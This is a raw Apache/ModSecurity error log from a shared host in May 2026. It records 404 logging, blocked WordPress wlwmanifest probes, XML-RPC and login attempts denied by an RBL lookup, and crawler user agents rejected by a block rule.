[Tue May 26 13:43:53.066526 2026] [security2:error] [pid 544395:tid 544564] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWQBmrs7g3RMCdp8XcHwAAACc"]
[Tue May 26 13:43:54.145810 2026] [security2:error] [pid 544395:tid 544529] [client 14.176.23.200:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWQRmrs7g3RMCdp8XcNQAAAAQ"]
[Tue May 26 13:43:55.432917 2026] [security2:error] [pid 544395:tid 544651] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWQhmrs7g3RMCdp8XcTAAAAH4"]
[Tue May 26 13:43:56.761541 2026] [security2:error] [pid 544395:tid 544415] [remote 141.95.202.18:43300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVWRBmrs7g3RMCdp8XcZwAAMhM"]
[Tue May 26 13:43:57.327617 2026] [security2:error] [pid 536875:tid 537119] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWROr_-FTveSGlx1H4QgAAAPc"]
[Tue May 26 13:43:58.866330 2026] [security2:error] [pid 536875:tid 537007] [client 167.99.12.84:54355] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVWRur_-FTveSGlx1H4aAAAAIc"]
[Tue May 26 13:43:59.045341 2026] [security2:error] [pid 544395:tid 544643] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWRhmrs7g3RMCdp8XchgAAAHY"]
[Tue May 26 13:43:59.977359 2026] [security2:error] [pid 536875:tid 537065] [client 129.222.147.134:28837] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWR-r_-FTveSGlx1H4egAAAME"]
[Tue May 26 13:43:59.985174 2026] [security2:error] [pid 536875:tid 537065] [client 129.222.147.134:28837] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWR-r_-FTveSGlx1H4egAAAME"]
[Tue May 26 13:44:00.636170 2026] [security2:error] [pid 544395:tid 544606] [client 114.119.138.207:45093] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/features/counters-countdown"] [unique_id "ahVWSBmrs7g3RMCdp8XcnAAAAFE"], referer: https://www.anujtradingco.com/features/counters-countdown/
[Tue May 26 13:44:00.768386 2026] [security2:error] [pid 536875:tid 537076] [client 2a02:3030:a7a:fe49:c6:ee2b:3aee:221a:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahVWR-r_-FTveSGlx1H4dQAAzDs"]
[Tue May 26 13:44:00.768390 2026] [security2:error] [pid 536875:tid 537077] [client 2a02:3030:a7a:fe49:c6:ee2b:3aee:221a:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahVWR-r_-FTveSGlx1H4dgAAzSE"]
[Tue May 26 13:44:00.899896 2026] [security2:error] [pid 536875:tid 537015] [client 167.99.12.84:55112] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVWSOr_-FTveSGlx1H4iQAAAI8"]
[Tue May 26 13:44:00.958056 2026] [security2:error] [pid 536875:tid 537046] [client 2a02:3030:a7a:fe49:c6:ee2b:3aee:221a:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahVWSOr_-FTveSGlx1H4iAAArjg"]
[Tue May 26 13:44:01.203848 2026] [security2:error] [pid 544395:tid 544619] [client 2a02:3030:a7a:fe49:c6:ee2b:3aee:221a:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahVWRxmrs7g3RMCdp8XclAAAXjc"]
[Tue May 26 13:44:01.207006 2026] [security2:error] [pid 536875:tid 537039] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWSOr_-FTveSGlx1H4hQAAAKc"]
[Tue May 26 13:44:02.928900 2026] [security2:error] [pid 536875:tid 537099] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWSur_-FTveSGlx1H4pAAAAOM"]
[Tue May 26 13:44:02.987661 2026] [security2:error] [pid 536875:tid 537104] [client 167.99.12.84:55171] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVWSur_-FTveSGlx1H4rwAAAOg"]
[Tue May 26 13:44:03.126933 2026] [security2:error] [pid 536875:tid 537041] [client 106.192.248.115:53747] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWS-r_-FTveSGlx1H4swAAAKk"]
[Tue May 26 13:44:03.127060 2026] [security2:error] [pid 536875:tid 537041] [client 106.192.248.115:53747] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWS-r_-FTveSGlx1H4swAAAKk"]
[Tue May 26 13:44:04.957752 2026] [security2:error] [pid 544395:tid 544554] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWTBmrs7g3RMCdp8XcwwAAAB0"]
[Tue May 26 13:44:05.257538 2026] [security2:error] [pid 544395:tid 544416] [remote 47.128.111.145:31236] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rohiniventures.com"] [uri "/robots.txt"] [unique_id "ahVWTRmrs7g3RMCdp8Xc0AAAGRQ"]
[Tue May 26 13:44:06.647692 2026] [security2:error] [pid 544395:tid 544568] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWThmrs7g3RMCdp8Xc4wAAACs"]
[Tue May 26 13:44:06.990187 2026] [security2:error] [pid 544395:tid 544545] [client 167.99.12.84:55253] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahVWThmrs7g3RMCdp8Xc6wAAABQ"]
[Tue May 26 13:44:07.408037 2026] [security2:error] [pid 544395:tid 544601] [client 114.119.153.186:61827] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/hakkimizda"] [unique_id "ahVWTxmrs7g3RMCdp8Xc8AAAAEw"], referer: https://bookmarkedblog.com/story9391444/mersin-web-tasarim-ajansi
[Tue May 26 13:44:07.619703 2026] [security2:error] [pid 544395:tid 544603] [client 167.99.12.84:55568] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVWTxmrs7g3RMCdp8Xc-gAAAE4"]
[Tue May 26 13:44:08.046038 2026] [security2:error] [pid 544395:tid 544542] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWTxmrs7g3RMCdp8Xc-QAAABE"]
[Tue May 26 13:44:08.092280 2026] [security2:error] [pid 544395:tid 544539] [client 167.99.12.84:55601] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahVWUBmrs7g3RMCdp8XdBgAAAA4"]
[Tue May 26 13:44:08.420242 2026] [security2:error] [pid 544395:tid 544526] [client 136.144.42.49:61797] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.42.144.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVWUBmrs7g3RMCdp8XdDQAAAAE"]
[Tue May 26 13:44:09.047058 2026] [core:error] [pid 544395:tid 544558] [client 198.235.24.249:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:44:09.047080 2026] [core:error] [pid 544395:tid 544558] [client 198.235.24.249:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:44:09.686072 2026] [security2:error] [pid 536875:tid 537019] [client 167.99.12.84:55650] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVWUer_-FTveSGlx1H5AgAAAJM"]
[Tue May 26 13:44:10.286561 2026] [security2:error] [pid 536875:tid 537076] [client 129.222.147.134:20303] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWUur_-FTveSGlx1H5DAAAAMw"]
[Tue May 26 13:44:10.286754 2026] [security2:error] [pid 536875:tid 537076] [client 129.222.147.134:20303] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWUur_-FTveSGlx1H5DAAAAMw"]
[Tue May 26 13:44:11.145933 2026] [security2:error] [pid 544395:tid 544536] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWUhmrs7g3RMCdp8XdLgAAAAs"]
[Tue May 26 13:44:12.542921 2026] [security2:error] [pid 544395:tid 544589] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWVBmrs7g3RMCdp8XdPAAAAEA"]
[Tue May 26 13:44:13.397343 2026] [security2:error] [pid 536875:tid 537064] [client 167.99.12.84:55770] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVWVer_-FTveSGlx1H5NAAAAMA"]
[Tue May 26 13:44:13.851087 2026] [security2:error] [pid 536875:tid 537062] [client 106.192.248.115:1037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWVer_-FTveSGlx1H5OwAAAL4"]
[Tue May 26 13:44:13.851232 2026] [security2:error] [pid 536875:tid 537062] [client 106.192.248.115:1037] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWVer_-FTveSGlx1H5OwAAAL4"]
[Tue May 26 13:44:13.900982 2026] [security2:error] [pid 544395:tid 544552] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWVRmrs7g3RMCdp8XdSAAAABs"]
[Tue May 26 13:44:14.612893 2026] [security2:error] [pid 544395:tid 544575] [client 85.204.70.118:39184] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kingsclubbanquet.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVWVhmrs7g3RMCdp8XdZAAAADI"]
[Tue May 26 13:44:14.971651 2026] [security2:error] [pid 544395:tid 544652] [client 167.99.12.84:56024] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVWVhmrs7g3RMCdp8XdaAAAAH8"]
[Tue May 26 13:44:15.384895 2026] [security2:error] [pid 544395:tid 544565] [client 85.204.70.118:39196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVWVxmrs7g3RMCdp8XdbwAAACg"]
[Tue May 26 13:44:16.101685 2026] [security2:error] [pid 544395:tid 544464] [remote 95.216.117.13:46124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVWVxmrs7g3RMCdp8XdfAAATkQ"]
[Tue May 26 13:44:16.559092 2026] [security2:error] [pid 544395:tid 544620] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWWBmrs7g3RMCdp8XdgwAAAF8"]
[Tue May 26 13:44:16.786026 2026] [security2:error] [pid 536875:tid 537076] [client 14.191.92.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWWOr_-FTveSGlx1H5TQAAAMw"]
[Tue May 26 13:44:17.459524 2026] [security2:error] [pid 544395:tid 544555] [client 85.204.70.118:39198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVWWRmrs7g3RMCdp8XdpwAAAB4"]
[Tue May 26 13:44:17.459647 2026] [security2:error] [pid 544395:tid 544555] [client 85.204.70.118:39198] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVWWRmrs7g3RMCdp8XdpwAAAB4"]
[Tue May 26 13:44:18.151472 2026] [security2:error] [pid 536875:tid 537121] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWWer_-FTveSGlx1H5VwAAAPk"]
[Tue May 26 13:44:18.464401 2026] [security2:error] [pid 536875:tid 537085] [client 167.99.12.84:56135] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVWWur_-FTveSGlx1H5XgAAANU"]
[Tue May 26 13:44:18.890960 2026] [security2:error] [pid 544395:tid 544641] [client 167.99.12.84:56471] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVWWhmrs7g3RMCdp8XdugAAAHQ"]
[Tue May 26 13:44:20.141475 2026] [security2:error] [pid 544395:tid 544554] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWWxmrs7g3RMCdp8XdwAAAAB0"]
[Tue May 26 13:44:20.488028 2026] [security2:error] [pid 536875:tid 537057] [client 129.222.147.134:38349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWXOr_-FTveSGlx1H5eQAAALk"]
[Tue May 26 13:44:20.491363 2026] [security2:error] [pid 536875:tid 537057] [client 129.222.147.134:38349] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWXOr_-FTveSGlx1H5eQAAALk"]
[Tue May 26 13:44:20.619070 2026] [security2:error] [pid 536875:tid 537073] [client 167.99.12.84:56504] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahVWXOr_-FTveSGlx1H5ewAAAMk"]
[Tue May 26 13:44:21.272795 2026] [security2:error] [pid 536875:tid 537110] [client 167.99.12.84:56638] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVWXer_-FTveSGlx1H5gQAAAO4"]
[Tue May 26 13:44:21.675014 2026] [security2:error] [pid 544395:tid 544631] [client 167.99.12.84:56670] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVWXRmrs7g3RMCdp8Xd4gAAAGo"]
[Tue May 26 13:44:22.118230 2026] [security2:error] [pid 544395:tid 544583] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWXRmrs7g3RMCdp8Xd5QAAADo"]
[Tue May 26 13:44:23.985363 2026] [security2:error] [pid 536875:tid 537090] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWX-r_-FTveSGlx1H5jwAAANo"]
[Tue May 26 13:44:24.004118 2026] [security2:error] [pid 544395:tid 544649] [client 106.192.248.115:54363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWYBmrs7g3RMCdp8XeEQAAAHw"]
[Tue May 26 13:44:24.004216 2026] [security2:error] [pid 544395:tid 544649] [client 106.192.248.115:54363] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWYBmrs7g3RMCdp8XeEQAAAHw"]
[Tue May 26 13:44:24.125409 2026] [security2:error] [pid 536875:tid 537074] [client 114.119.154.203:60087] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "corporatecargosolutions.com"] [uri "/robots.txt"] [unique_id "ahVWYOr_-FTveSGlx1H5mAAAAMo"]
[Tue May 26 13:44:25.075543 2026] [security2:error] [pid 544395:tid 544585] [client 167.99.12.84:56717] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "cargo-pulse.info"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahVWYRmrs7g3RMCdp8XeJAAAADw"]
[Tue May 26 13:44:25.830671 2026] [security2:error] [pid 544395:tid 544583] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWYRmrs7g3RMCdp8XeKQAAADo"]
